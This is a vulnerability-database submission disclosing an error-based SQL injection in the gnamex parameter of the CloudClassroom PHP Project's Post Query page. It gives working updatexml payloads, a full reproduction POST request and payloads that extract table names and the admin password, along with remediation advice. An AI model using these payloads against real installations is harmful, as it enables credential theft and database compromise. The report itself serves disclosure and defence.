Submit #744236: https://github.com/mathurvishal/CloudClassroom-PHP-Project CloudClassroom PHP Project 1.0 SQL Injectioninfo

Titelhttps://github.com/mathurvishal/CloudClassroom-PHP-Project CloudClassroom PHP Project 1.0 SQL Injection
BeschreibungCLOUD-CLASSROOMS-php-1.0 PoC - Sql Injection Erro Based Presentation: Security vulnerability: SQL Injection Vulnerability Type: Injection Affected Component: Post Query functionality (postquerypublic) Software: CloudClassroom PHP Project Version: 1.0 (discontinued). Business area: Education / e-Learning Platforms Describe the bug/issue: A SQL Injection vulnerability exists in the Post Query feature of the CloudClassroom PHP Project. The vulnerable parameter is gnamex (sent via POST), and the backend directly concatenates user input into SQL statements without proper sanitization or parameterized queries. This allows an attacker to inject arbitrary SQL commands, enabling: Extraction of sensitive information (user credentials, exam results, etc.) Enumeration of databases, tables, and columns Potential compromise of the entire application and underlying database Evidence of Vulnerability: The vulnerable endpoint: http:///CloudClassroom-PHP-Project-master/postquerypublic Vulnerable parameter: POST: gnamex Original SQL code (from source): $sql = "INSERT INTO query(Query, Eid) VALUES ('$tempsquery','$tempseid')"; Because the input is not sanitized, attackers can inject SQL like: a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1 Steps to Reproduce: Open the Post Query form at: http:///CloudClassroom-PHP-Project-master/postquerypublic Intercept the request (e.g., with Burp Suite) or craft a manual POST: POST /CloudClassroom-PHP-Project-master/postquerypublic Content-Type: application/x-www-form-urlencoded gnamex=a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1&[email protected]&squeryx=test&update=Post Query! Observe the response returning: XPATH syntax error: 'cc_db' Which reveals the current database name. Impact: Attackers can enumerate tables: a' AND updatexml(1,concat(0x7e,(SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1),0x7e),1) AND '1'='1 Extract sensitive data (e.g., usernames, hashed passwords from admin table): a' AND updatexml(1,concat(0x7e,(SELECT Apass FROM admin LIMIT 0,1),0x7e),1) AND '1'='1 Severity: High (CVSS 7.5) because it allows full database compromise. Expected behavior: The application should use parameterized queries (prepared statements) to handle user input securely, preventing any SQL code injection. Bug Fix Recommendation: Implement prepared statements in PHP using mysqli or PDO. Use input validation and escaping. Apply least privilege principle on the database user. References: CWE-89: SQL Injection OWASP SQL Injection Prevention Cheat Sheet Additional context: Using blacklist-based filtering is not reliable. Attackers can bypass such filters easily by using encoding tricks, inline comments, or alternate syntax. We can identify SQL injection by adding a single quote to the search.
Quelle⚠️ https://github.com/carlosalbertotuma/CLOUD-CLASSROOMS-php-1.0
Benutzer
 bl4dsc4n (UID 94778)
Einreichung22.01.2026 13:24 (vor 3 Monaten)
Moderieren06.02.2026 07:31 (15 days later)
StatusAkzeptiert
VulDB Eintrag344618 [mathurvishal CloudClassroom-PHP-Project bis 5dadec098bfbbf3300d60c3494db3fb95b66e7be Post Query Details Page /postquerypublic.php gnamex SQL Injection]
Punkte20

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!